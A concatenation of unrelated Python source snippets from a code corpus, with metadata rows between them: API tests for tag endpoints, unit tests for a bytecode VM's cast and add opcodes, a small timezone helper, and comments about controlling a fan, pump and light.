this payload is compulsory value and of str type,
so if value is not passed or passed any other value than string type,
it will return 400 i.e., bad request
"""
payload = {'tag': ''}
def test_tag_without_payload(self, client, url_prefix, token):
"""
Test-case without payloads and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token})
assert resp.status_code == 400
def test_tag_with_empty_payload(self, client, url_prefix, token):
"""
Test-case without payloads and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json={})
assert resp.status_code == 400
def test_tag_with_empty_str_payload(self, client, url_prefix, token):
"""
Test-case with payloads value is empty str and without existing tag data,
expected output:- status is failure
"""
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'failure'
def test_tag_with_payload_value_none(self, client, url_prefix, token):
"""
Test-case with payloads value is none and without existing tag data,
expected output:- status_code is 400
"""
self.payload['tag'] = None
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 400
def test_tag_with_invalid_method(self, client, url_prefix, token):
"""
Test-case with invalid request method,
expected output:- status code is 405
"""
resp = client.put(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 405
def test_tag_with_data(self, client, url_prefix, token, tag):
"""
Test-case with payloads value and with existing tag data,
expected output:- status is failure
"""
self.payload['tag'] = 'test'
resp = client.post(url_prefix + '/tags/add', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'failure'
class TestDeleteTag:
"""
Test-case inside this block where this payload value is used,
this payload is compulsory value and of str type,
so if value is not passed or passed any other value than string type,
it will return 400 i.e., bad request
"""
payload = {'tag': ''}
def test_tag_without_payload(self, client, url_prefix, token):
"""
Test-case without payloads and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token})
assert resp.status_code == 400
def test_tag_with_empty_payload(self, client, url_prefix, token):
"""
Test-case without payloads and without existing tag data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json={})
assert resp.status_code == 400
def test_tag_with_empty_str_payload(self, client, url_prefix, token):
"""
Test-case with payloads value is empty str and without existing tag data,
expected output:- status is failure
"""
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
def test_tag_with_payload_value_none(self, client, url_prefix, token):
"""
Test-case with payloads value is none and without existing tag data,
expected output:- status_code is 400
"""
self.payload['tag'] = None
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 400
def test_tag_with_invalid_method(self, client, url_prefix, token):
"""
Test-case with invalid request method,
expected output:- status code is 405
"""
resp = client.put(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 405
def test_tag_with_data(self, client, url_prefix, token, tag):
"""
Test-case with payloads value and with existing tag data,
expected output:- status is success
"""
self.payload['tag'] = 'test'
resp = client.post(url_prefix + '/tags/delete', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
class TestTaggedList:
"""
Test-case inside this block where this payload value is used,
this payload is compulsory value and of str type and here tag name
may more than one is also possible but that should be comma separated
in str type, so if value is not passed or passed
any other value than string type, it will return 400 i.e., bad request
"""
payload = {'tags': None}
def test_tagged_tags_without_payload(self, client, url_prefix, token):
"""
Test-case without payload, and
without existing tag, node, packa and queries data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token})
assert resp.status_code == 400
def test_tagged_tags_with_payload_empty_dict(self, client, url_prefix, token):
"""
Test-case with payload is empty dictionary, and
without existing tag, node, packa and queries data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json={})
assert resp.status_code == 400
def test_tagged_tags_with_payload_value_none(self, client, url_prefix, token):
"""
Test-case with payload values is none, and
without existing tag, node, packa and queries data,
expected output:- status_code is 400
"""
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 400
def test_tagged_tags_with_single_tag_name(self, client, url_prefix, token):
"""
Test-case with valid single tag name, and
without existing tag node, packa and queries data,
expected output:- status is success,
and resultant_data of hosts, packs and queries values are mepty list in this case.
"""
self.payload['tags'] = 'test'
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data'] == {"hosts": [], "packs": [], "queries": []}
def test_tagged_tags_with_multiple_tag_name(self, client, url_prefix, token):
"""
Test-case with valid multiple tag name, and
without existing tag node, packa and queries data,
expected output:- status is success,
and resultant_data of hosts, packs and queries values are mepty list in this case.
"""
self.payload['tags'] = 'test,test1'
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data'] == {"hosts": [], "packs": [], "queries": []}
def test_tagged_tag_with_invalid_method(self, client, url_prefix, token, tag):
"""
Test-case with invalid request method,
expected output:- status code is 405
"""
self.payload['tags'] = 'test'
resp = client.get(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 405
def test_tagged_tag_with_single_tag_name(self, client, url_prefix, token, node, packs, queries, tag):
"""
Test-case with valid single tag name,
and with existing tag, node, packa and queries data,
expected output:- status is success,
and resultant_data of hosts, packs and queries.
"""
self.payload['tags'] = 'test'
packs = packs_dao.get_pack_by_name('pytest_pack')
nod = hosts_dao.get_node_by_host_identifier('foobar')
query = queries_dao.get_query_by_name('test_query')
# create_tags(*self.payload['tags'].split(','))
t = Tag.query.filter(Tag.value == 'test').first()
packs.tags.append(t)
nod.tags.append(t)
query.tags.append(t)
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
data = get_tagged_list(['test'])
assert response_dict['data']['hosts'] == data['hosts']
assert response_dict['data']['packs'] == data['packs']
assert response_dict['data']['queries'] == data['queries']
def test_tagged_tag_with_multiple_tag_name(self, client, url_prefix, token, node, packs, queries, tag):
"""
Test-case with valid multiple tag name,
and with existing tag, node, packa and queries data,
expected output:- status is success,
and resultant_data of hosts, packs and queries.
"""
self.payload['tags'] = 'test,test1'
packs = packs_dao.get_pack_by_name('pytest_pack')
nod = hosts_dao.get_node_by_host_identifier('foobar')
query = queries_dao.get_query_by_name('test_query')
# create_tags(*self.payload['tags'].split(','))
t = Tag.query.filter(Tag.value == 'test').first()
packs.tags.append(t)
nod.tags.append(t)
query.tags.append(t)
resp = client.post(url_prefix + '/tags/tagged', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
data = get_tagged_list(['test', 'test1'])
assert response_dict['data']['hosts'] == data['hosts']
assert response_dict['data']['packs'] == data['packs']
assert response_dict['data']['queries'] == data['queries']
def get_tagged_list(tags):
hosts = [node.get_dict() for node in hosts_dao.get_tagged_nodes(tags) if
node.state != node.DELETED and node.state != node.REMOVED]
packs_queryset = packs_dao.get_tagged_packs(tags)
packs = marshal(packs_queryset, pack_wrappers.pack_wrapper)
for index in range(len(packs)):
packs[index]['tags'] = [tag.to_dict() for tag in packs_queryset[index].tags]
packs[index]['queries'] = marshal(packs_queryset[index].queries, query_wrappers.query_wrapper)
for query_index in range(len(packs_queryset[index].queries)):
packs[index]['queries'][query_index]['tags'] = [tag.to_dict() for tag in
packs_queryset[index].queries[query_index].tags]
packs[index]['queries'][query_index]['packs'] = [pack.name for pack in
packs_queryset[index].queries[query_index].packs]
queries_qs = queries_dao.get_tagged_queries(tags)
queries = marshal(queries_qs, query_wrappers.query_wrapper)
for i in range(len(queries)):
queries[i]['tags'] = [tag.to_dict() for tag in queries_qs[i].tags]
queries[i]['packs'] = [pack.name for pack in queries_qs[i].packs]
return {"hosts": hosts, "packs": packs, "queries": queries} | 45.218263 | 110 | 0.632567 | 2,633 | 20,303 | 4.710976 | 0.067224 | 0.057078 | 0.06385 | 0.051435 | 0.909303 | 0.889632 | 0.878749 | 0.86714 | 0.861577 | 0.847791 | 0 | 0.010361 | 0.248879 | 20,303 | 449 | 111 | 45.218263 | 0.803016 | 0.244594 | 0 | 0.715481 | 0 | 0 | 0.115175 | 0 | 0 | 0 | 0 | 0 | 0.301255 | 1 | 0.121339 | false | 0 | 0.020921 | 0 | 0.179916 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d1db5aebc843cb06410eadd5fa71507d9d67d1ec | 16,314 | py | Python | tests/test_vm_binary.py | fraca7/dsremap | fb8f4fb13e74b512ed0cac05387fbe9694faebcf | [
"MIT"
] | 8 | 2020-09-06T02:15:10.000Z | 2022-01-12T22:49:20.000Z | tests/test_vm_binary.py | fraca7/dsremap | fb8f4fb13e74b512ed0cac05387fbe9694faebcf | [
"MIT"
] | 5 | 2021-03-29T20:37:46.000Z | 2021-09-19T13:20:24.000Z | tests/test_vm_binary.py | fraca7/dsremap | fb8f4fb13e74b512ed0cac05387fbe9694faebcf | [
"MIT"
] | 2 | 2020-09-16T01:45:49.000Z | 2021-06-12T12:38:15.000Z | #!/usr/bin/env python3
import unittest
import io
import struct
import base
from vmwrapper import VM, Report
from dsrlib.compiler.opcodes import Opcodes
class TestCast(unittest.TestCase):
def setUp(self):
self._bytecode = io.BytesIO()
def add(self, data):
self._bytecode.write(data)
def add_opcode(self):
self.add(Opcodes.make_opcode(Opcodes.OPCODE_TYPE_BINARY, Opcodes.OPCODE_SUBTYPE_BINARY_CAST, Opcodes.OPCODE_VARIANT_A))
def create(self, stack=None):
vm = VM(bytecode=self._bytecode.getvalue(), stacksize=0 if stack is None else len(stack))
if stack is not None:
vm.push(stack)
return vm, self._bytecode.tell()
# In theory we don't need to support a const second operand, those are cast at compile time
def test_report_int_report_float(self):
self.add_opcode()
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUX))
vm, size = self.create()
report = Report(IMUX=42.5)
vm.step(report)
self.assertEqual(report.L2Value, 42)
self.assertEqual(vm.offset, size)
def test_regoff_int_regoff_float(self):
self.add_opcode()
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iif', 1, 13, 42.5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iif', 1, 42, 42.5))
self.assertEqual(vm.offset, size)
def test_regoff_float_regoff_int(self):
self.add_opcode()
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<ifi', 1, 42.5, 13))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<ifi', 1, 13.0, 13))
self.assertEqual(vm.offset, size)
def test_reg_report(self):
self.add_opcode()
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUX))
vm, size = self.create()
vm.step(Report(IMUX=42.5))
self.assertEqual(vm.TH, 42)
self.assertEqual(vm.offset, size)
def test_reg_int_regoff_float(self):
self.add_opcode();
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<if', 1, 42.5))
vm.step(Report())
self.assertEqual(vm.TH, 42)
self.assertEqual(vm.offset, size)
class TestAdd(unittest.TestCase):
def setUp(self):
self._bytecode = io.BytesIO()
def add(self, data):
self._bytecode.write(data)
def add_opcode(self, variant):
self.add(Opcodes.make_opcode(Opcodes.OPCODE_TYPE_BINARY, Opcodes.OPCODE_SUBTYPE_BINARY_ADD, variant))
def create(self, stack=None):
vm = VM(bytecode=self._bytecode.getvalue(), stacksize=0 if stack is None else len(stack))
if stack is not None:
vm.push(stack)
return vm, self._bytecode.tell()
# Constant source
def test_reg_C(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(struct.pack('<i', 42))
vm, size = self.create(stack=b'\x00\x00')
vm.step(Report())
self.assertEqual(vm.SP, 44)
self.assertEqual(vm.offset, size)
def test_report_C(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(struct.pack('<i', 42))
vm, size = self.create()
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_constaddr_C_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_INT))
self.add(struct.pack('<i', 42))
vm, size = self.create(stack=struct.pack('<iibii', 1, 2, 3, 4, 5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iibii', 1, 2, 3, 4 + 42, 5))
self.assertEqual(vm.offset, size)
def test_constaddr_C_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(struct.pack('<f', 42.5))
vm, size = self.create(stack=struct.pack('<iibfi', 1, 2, 3, 4.0, 5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iibfi', 1, 2, 3, 4.0 + 42.5, 5))
self.assertEqual(vm.offset, size)
def test_regoff_C_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(struct.pack('<i', 42))
vm, size = self.create(stack=struct.pack('<iii', 1, 2, 3))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 2 + 42, 3))
self.assertEqual(vm.offset, size)
def test_regoff_C_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_C)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(struct.pack('<f', 42.5))
vm, size = self.create(stack=struct.pack('<ifi', 1, 2.5, 3))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<ifi', 1, 2.5 + 42.5, 3))
self.assertEqual(vm.offset, size)
# Same source/target
def test_reg_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create(stack=b'\x00\x00')
vm.TH = 42
vm.step(Report())
self.assertEqual(vm.SP, 2 + 42)
self.assertEqual(vm.offset, size)
def test_report_report(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_R2VALUE))
vm, size = self.create()
report = Report(L2Value=9, R2Value=42)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_constaddr_constaddr_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iii', 1, 13, 42))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 13 + 42, 42))
self.assertEqual(vm.offset, size)
def test_constaddr_constaddr_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 8, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iff', 1, 13.5, 42.5))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iff', 1, 13.5 + 42.5, 42.5))
self.assertEqual(vm.offset, size)
def test_regoff_regoff_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -12, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iiii', 1, 2, 3, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iiii', 1, 2, 5, 4))
self.assertEqual(vm.offset, size)
def test_regoff_regoff_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -12, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iffi', 1, 2.5, 3.5, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iffi', 1, 2.5, 6.0, 4))
self.assertEqual(vm.offset, size)
# Reg target
def test_reg_report(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
vm, size = self.create(stack=b'\x00\x00')
vm.step(Report(L2Value=42))
self.assertEqual(vm.SP, 44)
self.assertEqual(vm.offset, size)
def test_reg_constaddr(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iibii', 1, 2, 3, 42, 13))
vm.step(Report())
self.assertEqual(vm.SP, 17 + 42)
self.assertEqual(vm.offset, size)
def test_reg_regoff(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_SP))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iii', 1, 42, 3))
vm.step(Report())
self.assertEqual(vm.SP, 12 + 42)
self.assertEqual(vm.offset, size)
# Report target
def test_report_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create()
vm.TH = 42
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_report_constaddr(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 9, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iibii', 1, 2, 3, 42, 13))
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
def test_report_regoff(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iii', 1, 42, 3))
report = Report(L2Value=9)
vm.step(report)
self.assertEqual(report.L2Value, 9 + 42)
self.assertEqual(vm.offset, size)
# constaddr target
def test_constaddr_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create(stack=struct.pack('<ii', 1, 2))
vm.TH = 42;
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<ii', 1, 2 + 42))
self.assertEqual(vm.offset, size)
def test_constaddr_report_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
vm, size = self.create(stack=struct.pack('<ii', 1, 2))
report = Report(L2Value=42)
vm.step(report)
self.assertEqual(vm.get_stack(), struct.pack('<ii', 1, 2 + 42))
self.assertEqual(vm.offset, size)
def test_constaddr_report_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUX))
vm, size = self.create(stack=struct.pack('<if', 1, 2.0))
report = Report(IMUX=42.5)
vm.step(report)
self.assertEqual(vm.get_stack(), struct.pack('<if', 1, 2.0 + 42.5))
self.assertEqual(vm.offset, size)
def test_constaddr_regoff_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iiii', 1, 2, 3, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iiii', 1, 5, 3, 4))
self.assertEqual(vm.offset, size)
def test_constaddr_regoff_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iffi', 1, 2.5, 3.5, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iffi', 1, 6.0, 3.5, 4))
self.assertEqual(vm.offset, size)
# Regoff target
def test_regoff_reg(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_TH))
vm, size = self.create(stack=struct.pack('<iii', 1, 2, 3))
vm.TH = 42
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 2 + 42, 3))
self.assertEqual(vm.offset, size)
def test_regoff_report_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_L2VALUE))
vm, size = self.create(stack=struct.pack('<iii', 1, 2, 3))
vm.step(Report(L2Value=42))
self.assertEqual(vm.get_stack(), struct.pack('<iii', 1, 2 + 42, 3))
self.assertEqual(vm.offset, size)
def test_regoff_report_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_reg(Opcodes.REGINDEX_IMUY))
vm, size = self.create(stack=struct.pack('<ifi', 1, 2.5, 3))
vm.step(Report(IMUY=42.5))
self.assertEqual(vm.get_stack(), struct.pack('<ifi', 1, 2.5 + 42.5, 3))
self.assertEqual(vm.offset, size)
def test_regoff_constaddr_int(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_INT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_INT))
vm, size = self.create(stack=struct.pack('<iiii', 1, 2, 3, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iiii', 1, 2, 5, 4))
self.assertEqual(vm.offset, size)
def test_regoff_constaddr_float(self):
self.add_opcode(Opcodes.OPCODE_VARIANT_A)
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_SP, -8, Opcodes.ADDR_VALTYPE_FLOAT))
self.add(Opcodes.make_addr_regoff(Opcodes.REGINDEX_ZR, 4, Opcodes.ADDR_VALTYPE_FLOAT))
vm, size = self.create(stack=struct.pack('<iffi', 1, 2.5, 3.5, 4))
vm.step(Report())
self.assertEqual(vm.get_stack(), struct.pack('<iffi', 1, 2.5, 6.0, 4))
self.assertEqual(vm.offset, size)
if __name__ == '__main__':
unittest.main()
| 37.246575 | 127 | 0.662192 | 2,355 | 16,314 | 4.383015 | 0.05138 | 0.068494 | 0.084092 | 0.108119 | 0.94875 | 0.947006 | 0.94255 | 0.930827 | 0.913001 | 0.884615 | 0 | 0.030163 | 0.201361 | 16,314 | 437 | 128 | 37.331808 | 0.762069 | 0.012382 | 0 | 0.75 | 0 | 0 | 0.014965 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.133117 | false | 0 | 0.019481 | 0 | 0.165584 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae3200971f248135830c186f4ec29937ef476d00 | 110 | py | Python | joey/utils/timezone.py | pinecrew/joey | 0a4715051629aa58b2333365149d2f3a4c6f4dee | [
"MIT"
] | 1 | 2020-08-23T22:33:06.000Z | 2020-08-23T22:33:06.000Z | joey/utils/timezone.py | pinecrew/joey | 0a4715051629aa58b2333365149d2f3a4c6f4dee | [
"MIT"
] | 8 | 2020-08-13T13:20:19.000Z | 2020-10-19T10:26:17.000Z | joey/utils/timezone.py | pinecrew/joey | 0a4715051629aa58b2333365149d2f3a4c6f4dee | [
"MIT"
] | null | null | null | from datetime import datetime as dt
import pytz
def now():
return dt.utcnow().replace(tzinfo=pytz.utc)
| 13.75 | 47 | 0.727273 | 17 | 110 | 4.705882 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172727 | 110 | 7 | 48 | 15.714286 | 0.879121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
ae6c24e43cb3e06da678397c75a90481eae5cfb0 | 88 | py | Python | tasks/learn.py | w0w/miniPFC | 63b1bf608de03efada2a1b57c0370b6a7c2bf1ad | [
"MIT"
] | null | null | null | tasks/learn.py | w0w/miniPFC | 63b1bf608de03efada2a1b57c0370b6a7c2bf1ad | [
"MIT"
] | null | null | null | tasks/learn.py | w0w/miniPFC | 63b1bf608de03efada2a1b57c0370b6a7c2bf1ad | [
"MIT"
] | null | null | null | '''
decide to turn on/off fan
decide to turn on/off pump
decide to turn on/off light
